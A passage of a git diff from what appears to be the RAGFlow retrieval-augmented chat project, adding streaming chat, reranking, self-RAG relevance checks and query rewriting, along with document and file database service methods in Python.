chat_logger.info("Use SQL to retrieval:{}".format(questions[-1]))
|
||||
ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
|
||||
if ans: return ans
|
||||
if ans:
|
||||
yield ans
|
||||
return
|
||||
|
||||
for p in prompt_config["parameters"]:
|
||||
if p["key"] == "knowledge":
|
||||
@ -105,38 +112,57 @@ def chat(dialog, messages, **kwargs):
|
||||
prompt_config["system"] = prompt_config["system"].replace(
|
||||
"{%s}" % p["key"], " ")
|
||||
|
||||
rerank_mdl = None
|
||||
if dialog.rerank_id:
|
||||
rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
|
||||
|
||||
for _ in range(len(questions) // 2):
|
||||
questions.append(questions[-1])
|
||||
if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
|
||||
kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
|
||||
else:
|
||||
if prompt_config.get("keyword", False):
|
||||
questions[-1] += keyword_extraction(chat_mdl, questions[-1])
|
||||
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight, top=1024, aggs=False)
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
|
||||
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
#self-rag
|
||||
if dialog.prompt_config.get("self_rag") and not relevant(dialog.tenant_id, dialog.llm_id, questions[-1], knowledges):
|
||||
questions[-1] = rewrite(dialog.tenant_id, dialog.llm_id, questions[-1])
|
||||
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
|
||||
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
|
||||
chat_logger.info(
|
||||
"{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
|
||||
|
||||
if not knowledges and prompt_config.get("empty_response"):
|
||||
return {
|
||||
"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
yield {"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
return {"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
|
||||
kwargs["knowledge"] = "\n".join(knowledges)
|
||||
gen_conf = dialog.llm_setting
|
||||
msg = [{"role": m["role"], "content": m["content"]}
|
||||
for m in messages if m["role"] != "system"]
|
||||
|
||||
msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
|
||||
msg.extend([{"role": m["role"], "content": m["content"]}
|
||||
for m in messages if m["role"] != "system"])
|
||||
used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
|
||||
assert len(msg) >= 2, f"message_fit_in has bug: {msg}"
|
||||
|
||||
if "max_tokens" in gen_conf:
|
||||
gen_conf["max_tokens"] = min(
|
||||
gen_conf["max_tokens"],
|
||||
max_tokens - used_token_count)
|
||||
answer = chat_mdl.chat(
|
||||
prompt_config["system"].format(
|
||||
**kwargs), msg, gen_conf)
|
||||
chat_logger.info("User: {}|Assistant: {}".format(
|
||||
msg[-1]["content"], answer))
|
||||
|
||||
if knowledges and prompt_config.get("quote", True):
|
||||
def decorate_answer(answer):
|
||||
nonlocal prompt_config, knowledges, kwargs, kbinfos
|
||||
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
|
||||
answer, idx = retrievaler.insert_citations(answer,
|
||||
[ck["content_ltks"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
@ -151,12 +177,26 @@ def chat(dialog, messages, **kwargs):
|
||||
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
|
||||
kbinfos["doc_aggs"] = recall_docs
|
||||
|
||||
for c in kbinfos["chunks"]:
|
||||
refs = deepcopy(kbinfos)
|
||||
for c in refs["chunks"]:
|
||||
if c.get("vector"):
|
||||
del c["vector"]
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api")>=0:
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
return {"answer": answer, "reference": kbinfos}
|
||||
return {"answer": answer, "reference": refs}
|
||||
|
||||
if stream:
|
||||
answer = ""
|
||||
for ans in chat_mdl.chat_streamly(msg[0]["content"], msg[1:], gen_conf):
|
||||
answer = ans
|
||||
yield {"answer": answer, "reference": {}}
|
||||
yield decorate_answer(answer)
|
||||
else:
|
||||
answer = chat_mdl.chat(
|
||||
msg[0]["content"], msg[1:], gen_conf)
|
||||
chat_logger.info("User: {}|Assistant: {}".format(
|
||||
msg[-1]["content"], answer))
|
||||
yield decorate_answer(answer)
|
||||
|
||||
|
||||
def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
@ -248,7 +288,8 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
|
||||
# compose markdown table
|
||||
clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
|
||||
tbl["columns"][i]["name"])) for i in clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
tbl["columns"][i]["name"])) for i in
|
||||
clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
|
||||
line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
|
||||
("|------|" if docid_idx and docid_idx else "")
|
||||
@ -258,7 +299,8 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
"|" for r in tbl["rows"]]
|
||||
if quota:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else: rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)
|
||||
|
||||
if not docid_idx or not docnm_idx:
|
||||
@ -278,5 +320,40 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
return {
|
||||
"answer": "\n".join([clmns, line, rows]),
|
||||
"reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in doc_aggs.items()]}
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in
|
||||
doc_aggs.items()]}
|
||||
}
|
||||
|
||||
|
||||
def relevant(tenant_id, llm_id, question, contents: list):
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are a grader assessing relevance of a retrieved document to a user question.
|
||||
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
|
||||
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
|
||||
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
|
||||
No other words needed except 'yes' or 'no'.
|
||||
"""
|
||||
if not contents:return False
|
||||
contents = "Documents: \n" + " - ".join(contents)
|
||||
contents = f"Question: {question}\n" + contents
|
||||
if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
|
||||
contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
|
||||
if ans.lower().find("yes") >= 0: return True
|
||||
return False
|
||||
|
||||
|
||||
def rewrite(tenant_id, llm_id, question):
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are an expert at query expansion to generate a paraphrasing of a question.
|
||||
I can't retrieval relevant information from the knowledge base by using user's question directly.
|
||||
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
|
||||
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
|
||||
changing the way of expression, translating the original question into another language (English/Chinese), etc.
|
||||
And return 5 versions of question and one is from translation.
|
||||
Just list the question. No other words are needed.
|
||||
"""
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
|
||||
return ans
|
||||
|
||||
@ -13,14 +13,26 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from peewee import Expression
|
||||
import random
|
||||
from datetime import datetime
|
||||
from elasticsearch_dsl import Q
|
||||
from peewee import fn
|
||||
|
||||
from api.db.db_utils import bulk_insert_into_db
|
||||
from api.settings import stat_logger
|
||||
from api.utils import current_timestamp, get_format_time, get_uuid
|
||||
from rag.settings import SVR_QUEUE_NAME
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from rag.nlp import search
|
||||
|
||||
from api.db import FileType, TaskStatus
|
||||
from api.db.db_models import DB, Knowledgebase, Tenant
|
||||
from api.db.db_models import DB, Knowledgebase, Tenant, Task
|
||||
from api.db.db_models import Document
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db import StatusEnum
|
||||
from rag.utils.redis_conn import REDIS_CONN
|
||||
|
||||
|
||||
class DocumentService(CommonService):
|
||||
@ -32,8 +44,9 @@ class DocumentService(CommonService):
|
||||
orderby, desc, keywords):
|
||||
if keywords:
|
||||
docs = cls.model.select().where(
|
||||
cls.model.kb_id == kb_id,
|
||||
cls.model.name.like(f"%%{keywords}%%"))
|
||||
(cls.model.kb_id == kb_id),
|
||||
(fn.LOWER(cls.model.name).contains(keywords.lower()))
|
||||
)
|
||||
else:
|
||||
docs = cls.model.select().where(cls.model.kb_id == kb_id)
|
||||
count = docs.count()
|
||||
@ -46,6 +59,35 @@ class DocumentService(CommonService):
|
||||
|
||||
return list(docs.dicts()), count
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def list_documents_in_dataset(cls, dataset_id, offset, count, order_by, descend, keywords):
|
||||
if keywords:
|
||||
docs = cls.model.select().where(
|
||||
(cls.model.kb_id == dataset_id),
|
||||
(fn.LOWER(cls.model.name).contains(keywords.lower()))
|
||||
)
|
||||
else:
|
||||
docs = cls.model.select().where(cls.model.kb_id == dataset_id)
|
||||
|
||||
total = docs.count()
|
||||
|
||||
if descend == 'True':
|
||||
docs = docs.order_by(cls.model.getter_by(order_by).desc())
|
||||
if descend == 'False':
|
||||
docs = docs.order_by(cls.model.getter_by(order_by).asc())
|
||||
|
||||
docs = list(docs.dicts())
|
||||
docs_length = len(docs)
|
||||
|
||||
if offset < 0 or offset > docs_length:
|
||||
raise IndexError("Offset is out of the valid range.")
|
||||
|
||||
if count == -1:
|
||||
return docs[offset:], total
|
||||
|
||||
return docs[offset:offset + count], total
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, doc):
|
||||
@ -62,16 +104,15 @@ class DocumentService(CommonService):
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete(cls, doc):
|
||||
e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
|
||||
if not KnowledgebaseService.update_by_id(
|
||||
kb.id, {"doc_num": kb.doc_num - 1}):
|
||||
raise RuntimeError("Database error (Knowledgebase)!")
|
||||
def remove_document(cls, doc, tenant_id):
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
|
||||
cls.clear_chunk_num(doc.id)
|
||||
return cls.delete_by_id(doc.id)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_newly_uploaded(cls, tm, mod=0, comm=1, items_per_page=64):
|
||||
def get_newly_uploaded(cls):
|
||||
fields = [
|
||||
cls.model.id,
|
||||
cls.model.kb_id,
|
||||
@ -93,17 +134,15 @@ class DocumentService(CommonService):
|
||||
cls.model.status == StatusEnum.VALID.value,
|
||||
~(cls.model.type == FileType.VIRTUAL.value),
|
||||
cls.model.progress == 0,
|
||||
cls.model.update_time >= tm,
|
||||
cls.model.run == TaskStatus.RUNNING.value,
|
||||
(Expression(cls.model.create_time, "%%", comm) == mod))\
|
||||
.order_by(cls.model.update_time.asc())\
|
||||
.paginate(1, items_per_page)
|
||||
cls.model.update_time >= current_timestamp() - 1000 * 600,
|
||||
cls.model.run == TaskStatus.RUNNING.value)\
|
||||
.order_by(cls.model.update_time.asc())
|
||||
return list(docs.dicts())
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_unfinished_docs(cls):
|
||||
fields = [cls.model.id, cls.model.process_begin_at]
|
||||
fields = [cls.model.id, cls.model.process_begin_at, cls.model.parser_config, cls.model.progress_msg]
|
||||
docs = cls.model.select(*fields) \
|
||||
.where(
|
||||
cls.model.status == StatusEnum.VALID.value,
|
||||
@ -130,6 +169,22 @@ class DocumentService(CommonService):
|
||||
Knowledgebase.id == kb_id).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def clear_chunk_num(cls, doc_id):
|
||||
doc = cls.model.get_by_id(doc_id)
|
||||
assert doc, "Can't fine document in database."
|
||||
|
||||
num = Knowledgebase.update(
|
||||
token_num=Knowledgebase.token_num -
|
||||
doc.token_num,
|
||||
chunk_num=Knowledgebase.chunk_num -
|
||||
doc.chunk_num,
|
||||
doc_num=Knowledgebase.doc_num-1
|
||||
).where(
|
||||
Knowledgebase.id == doc.kb_id).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_tenant_id(cls, doc_id):
|
||||
@ -143,6 +198,43 @@ class DocumentService(CommonService):
|
||||
return
|
||||
return docs[0]["tenant_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_tenant_id_by_name(cls, name):
|
||||
docs = cls.model.select(
|
||||
Knowledgebase.tenant_id).join(
|
||||
Knowledgebase, on=(
|
||||
Knowledgebase.id == cls.model.kb_id)).where(
|
||||
cls.model.name == name, Knowledgebase.status == StatusEnum.VALID.value)
|
||||
docs = docs.dicts()
|
||||
if not docs:
|
||||
return
|
||||
return docs[0]["tenant_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_embd_id(cls, doc_id):
|
||||
docs = cls.model.select(
|
||||
Knowledgebase.embd_id).join(
|
||||
Knowledgebase, on=(
|
||||
Knowledgebase.id == cls.model.kb_id)).where(
|
||||
cls.model.id == doc_id, Knowledgebase.status == StatusEnum.VALID.value)
|
||||
docs = docs.dicts()
|
||||
if not docs:
|
||||
return
|
||||
return docs[0]["embd_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_doc_id_by_doc_name(cls, doc_name):
|
||||
fields = [cls.model.id]
|
||||
doc_id = cls.model.select(*fields) \
|
||||
.where(cls.model.name == doc_name)
|
||||
doc_id = doc_id.dicts()
|
||||
if not doc_id:
|
||||
return
|
||||
return doc_id[0]["id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_thumbnails(cls, docids):
|
||||
@ -177,3 +269,82 @@ class DocumentService(CommonService):
|
||||
on=(Knowledgebase.id == cls.model.kb_id)).where(
|
||||
Knowledgebase.tenant_id == tenant_id)
|
||||
return len(docs)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def begin2parse(cls, docid):
|
||||
cls.update_by_id(
|
||||
docid, {"progress": random.random() * 1 / 100.,
|
||||
"progress_msg": "Task dispatched...",
|
||||
"process_begin_at": get_format_time()
|
||||
})
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_progress(cls):
|
||||
docs = cls.get_unfinished_docs()
|
||||
for d in docs:
|
||||
try:
|
||||
tsks = Task.query(doc_id=d["id"], order_by=Task.create_time)
|
||||
if not tsks:
|
||||
continue
|
||||
msg = []
|
||||
prg = 0
|
||||
finished = True
|
||||
bad = 0
|
||||
status = TaskStatus.RUNNING.value
|
||||
for t in tsks:
|
||||
if 0 <= t.progress < 1:
|
||||
finished = False
|
||||
prg += t.progress if t.progress >= 0 else 0
|
||||
msg.append(t.progress_msg)
|
||||
if t.progress == -1:
|
||||
bad += 1
|
||||
prg /= len(tsks)
|
||||
if finished and bad:
|
||||
prg = -1
|
||||
status = TaskStatus.FAIL.value
|
||||
elif finished:
|
||||
if d["parser_config"].get("raptor", {}).get("use_raptor") and d["progress_msg"].lower().find(" raptor")<0:
|
||||
queue_raptor_tasks(d)
|
||||
prg *= 0.98
|
||||
msg.append("------ RAPTOR -------")
|
||||
else:
|
||||
status = TaskStatus.DONE.value
|
||||
|
||||
msg = "\n".join(msg)
|
||||
info = {
|
||||
"process_duation": datetime.timestamp(
|
||||
datetime.now()) -
|
||||
d["process_begin_at"].timestamp(),
|
||||
"run": status}
|
||||
if prg != 0:
|
||||
info["progress"] = prg
|
||||
if msg:
|
||||
info["progress_msg"] = msg
|
||||
cls.update_by_id(d["id"], info)
|
||||
except Exception as e:
|
||||
stat_logger.error("fetch task exception:" + str(e))
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_kb_doc_count(cls, kb_id):
|
||||
return len(cls.model.select(cls.model.id).where(
|
||||
cls.model.kb_id == kb_id).dicts())
|
||||
|
||||
|
||||
def queue_raptor_tasks(doc):
|
||||
def new_task():
|
||||
nonlocal doc
|
||||
return {
|
||||
"id": get_uuid(),
|
||||
"doc_id": doc["id"],
|
||||
"from_page": 0,
|
||||
"to_page": -1,
|
||||
"progress_msg": "Start to do RAPTOR (Recursive Abstractive Processing For Tree-Organized Retrieval)."
|
||||
}
|
||||
|
||||
task = new_task()
|
||||
bulk_insert_into_db(Task, [task], True)
|
||||
task["type"] = "raptor"
|
||||
assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=task), "Can't access Redis. Please check the Redis' status."
|
||||
85
api/db/services/file2document_service.py
Normal file
85
api/db/services/file2document_service.py
Normal file
@ -0,0 +1,85 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
|
||||
from api.db import FileSource
|
||||
from api.db.db_models import DB
|
||||
from api.db.db_models import File, File2Document
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.utils import current_timestamp, datetime_format, get_uuid
|
||||
|
||||
|
||||
class File2DocumentService(CommonService):
|
||||
model = File2Document
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_file_id(cls, file_id):
|
||||
objs = cls.model.select().where(cls.model.file_id == file_id)
|
||||
return objs
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_document_id(cls, document_id):
|
||||
objs = cls.model.select().where(cls.model.document_id == document_id)
|
||||
return objs
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, obj):
|
||||
if not cls.save(**obj):
|
||||
raise RuntimeError("Database error (File)!")
|
||||
e, obj = cls.get_by_id(obj["id"])
|
||||
if not e:
|
||||
raise RuntimeError("Database error (File retrieval)!")
|
||||
return obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_by_file_id(cls, file_id):
|
||||
return cls.model.delete().where(cls.model.file_id == file_id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_by_document_id(cls, doc_id):
|
||||
return cls.model.delete().where(cls.model.document_id == doc_id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_by_file_id(cls, file_id, obj):
|
||||
obj["update_time"] = current_timestamp()
|
||||
obj["update_date"] = datetime_format(datetime.now())
|
||||
num = cls.model.update(obj).where(cls.model.id == file_id).execute()
|
||||
e, obj = cls.get_by_id(cls.model.id)
|
||||
return obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_minio_address(cls, doc_id=None, file_id=None):
|
||||
if doc_id:
|
||||
f2d = cls.get_by_document_id(doc_id)
|
||||
else:
|
||||
f2d = cls.get_by_file_id(file_id)
|
||||
if f2d:
|
||||
file = File.get_by_id(f2d[0].file_id)
|
||||
if file.source_type == FileSource.LOCAL:
|
||||
return file.parent_id, file.location
|
||||
doc_id = f2d[0].document_id
|
||||
|
||||
assert doc_id, "please specify doc_id"
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
return doc.kb_id, doc.location
|
||||
315
api/db/services/file_service.py
Normal file
315
api/db/services/file_service.py
Normal file
@ -0,0 +1,315 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask_login import current_user
|
||||
from peewee import fn
|
||||
|
||||
from api.db import FileType, KNOWLEDGEBASE_FOLDER_NAME, FileSource
|
||||
from api.db.db_models import DB, File2Document, Knowledgebase
|
||||
from api.db.db_models import File, Document
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.utils import get_uuid
|
||||
|
||||
|
||||
class FileService(CommonService):
|
||||
model = File
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_pf_id(cls, tenant_id, pf_id, page_number, items_per_page,
|
||||
orderby, desc, keywords):
|
||||
if keywords:
|
||||
files = cls.model.select().where(
|
||||
(cls.model.tenant_id == tenant_id),
|
||||
(cls.model.parent_id == pf_id),
|
||||
(fn.LOWER(cls.model.name).contains(keywords.lower())),
|
||||
~(cls.model.id == pf_id)
|
||||
)
|
||||
else:
|
||||
files = cls.model.select().where((cls.model.tenant_id == tenant_id),
|
||||
(cls.model.parent_id == pf_id),
|
||||
~(cls.model.id == pf_id)
|
||||
)
|
||||
count = files.count()
|
||||
if desc:
|
||||
files = files.order_by(cls.model.getter_by(orderby).desc())
|
||||
else:
|
||||
files = files.order_by(cls.model.getter_by(orderby).asc())
|
||||
|
||||
files = files.paginate(page_number, items_per_page)
|
||||
|
||||
res_files = list(files.dicts())
|
||||
for file in res_files:
|
||||
if file["type"] == FileType.FOLDER.value:
|
||||
file["size"] = cls.get_folder_size(file["id"])
|
||||
file['kbs_info'] = []
|
||||
continue
|
||||
kbs_info = cls.get_kb_id_by_file_id(file['id'])
|
||||
file['kbs_info'] = kbs_info
|
||||
|
||||
return res_files, count
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_kb_id_by_file_id(cls, file_id):
|
||||
kbs = (cls.model.select(*[Knowledgebase.id, Knowledgebase.name])
|
||||
.join(File2Document, on=(File2Document.file_id == file_id))
|
||||
.join(Document, on=(File2Document.document_id == Document.id))
|
||||
.join(Knowledgebase, on=(Knowledgebase.id == Document.kb_id))
|
||||
.where(cls.model.id == file_id))
|
||||
if not kbs: return []
|
||||
kbs_info_list = []
|
||||
for kb in list(kbs.dicts()):
|
||||
kbs_info_list.append({"kb_id": kb['id'], "kb_name": kb['name']})
|
||||
return kbs_info_list
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_pf_id_name(cls, id, name):
|
||||
file = cls.model.select().where((cls.model.parent_id == id) & (cls.model.name == name))
|
||||
if file.count():
|
||||
e, file = cls.get_by_id(file[0].id)
|
||||
if not e:
|
||||
raise RuntimeError("Database error (File retrieval)!")
|
||||
return file
|
||||
return None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_id_list_by_id(cls, id, name, count, res):
|
||||
if count < len(name):
|
||||
file = cls.get_by_pf_id_name(id, name[count])
|
||||
if file:
|
||||
res.append(file.id)
|
||||
return cls.get_id_list_by_id(file.id, name, count + 1, res)
|
||||
else:
|
||||
return res
|
||||
else:
|
||||
return res
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_all_innermost_file_ids(cls, folder_id, result_ids):
|
||||
subfolders = cls.model.select().where(cls.model.parent_id == folder_id)
|
||||
if subfolders.exists():
|
||||
for subfolder in subfolders:
|
||||
cls.get_all_innermost_file_ids(subfolder.id, result_ids)
|
||||
else:
|
||||
result_ids.append(folder_id)
|
||||
return result_ids
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def create_folder(cls, file, parent_id, name, count):
|
||||
if count > len(name) - 2:
|
||||
return file
|
||||
else:
|
||||
file = cls.insert({
|
||||
"id": get_uuid(),
|
||||
"parent_id": parent_id,
|
||||
"tenant_id": current_user.id,
|
||||
"created_by": current_user.id,
|
||||
"name": name[count],
|
||||
"location": "",
|
||||
"size": 0,
|
||||
"type": FileType.FOLDER.value
|
||||
})
|
||||
return cls.create_folder(file, file.id, name, count + 1)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def is_parent_folder_exist(cls, parent_id):
|
||||
parent_files = cls.model.select().where(cls.model.id == parent_id)
|
||||
if parent_files.count():
|
||||
return True
|
||||
cls.delete_folder_by_pf_id(parent_id)
|
||||
return False
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_root_folder(cls, tenant_id):
|
||||
for file in cls.model.select().where((cls.model.tenant_id == tenant_id),
|
||||
(cls.model.parent_id == cls.model.id)
|
||||
):
|
||||
return file.to_dict()
|
||||
|
||||
file_id = get_uuid()
|
||||
file = {
|
||||
"id": file_id,
|
||||
"parent_id": file_id,
|
||||
"tenant_id": tenant_id,
|
||||
"created_by": tenant_id,
|
||||
"name": "/",
|
||||
"type": FileType.FOLDER.value,
|
||||
"size": 0,
|
||||
"location": "",
|
||||
}
|
||||
cls.save(**file)
|
||||
return file
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_kb_folder(cls, tenant_id):
|
||||
for root in cls.model.select().where(
|
||||
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == cls.model.id)):
|
||||
for folder in cls.model.select().where(
|
||||
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == root.id),
|
||||
(cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)):
|
||||
return folder.to_dict()
|
||||
assert False, "Can't find the KB folder. Database init error."
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def new_a_file_from_kb(cls, tenant_id, name, parent_id, ty=FileType.FOLDER.value, size=0, location=""):
|
||||
for file in cls.query(tenant_id=tenant_id, parent_id=parent_id, name=name):
|
||||
return file.to_dict()
|
||||
file = {
|
||||
"id": get_uuid(),
|
||||
"parent_id": parent_id,
|
||||
"tenant_id": tenant_id,
|
||||
"created_by": tenant_id,
|
||||
"name": name,
|
||||
"type": ty,
|
||||
"size": size,
|
||||
"location": location,
|
||||
"source_type": FileSource.KNOWLEDGEBASE
|
||||
}
|
||||
cls.save(**file)
|
||||
return file
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def init_knowledgebase_docs(cls, root_id, tenant_id):
|
||||
for _ in cls.model.select().where((cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)\
|
||||
& (cls.model.parent_id == root_id)):
|
||||
return
|
||||
folder = cls.new_a_file_from_kb(tenant_id, KNOWLEDGEBASE_FOLDER_NAME, root_id)
|
||||
|
||||
for kb in Knowledgebase.select(*[Knowledgebase.id, Knowledgebase.name]).where(Knowledgebase.tenant_id==tenant_id):
|
||||
kb_folder = cls.new_a_file_from_kb(tenant_id, kb.name, folder["id"])
|
||||
for doc in DocumentService.query(kb_id=kb.id):
|
||||
FileService.add_file_from_kb(doc.to_dict(), kb_folder["id"], tenant_id)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_parent_folder(cls, file_id):
|
||||
file = cls.model.select().where(cls.model.id == file_id)
|
||||
if file.count():
|
||||
e, file = cls.get_by_id(file[0].parent_id)
|
||||
if not e:
|
||||
raise RuntimeError("Database error (File retrieval)!")
|
||||
else:
|
||||
raise RuntimeError("Database error (File doesn't exist)!")
|
||||
return file
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_all_parent_folders(cls, start_id):
|
||||
parent_folders = []
|
||||
current_id = start_id
|
||||
while current_id:
|
||||
e, file = cls.get_by_id(current_id)
|
||||
if file.parent_id != file.id and e:
|
||||
parent_folders.append(file)
|
||||
current_id = file.parent_id
|
||||
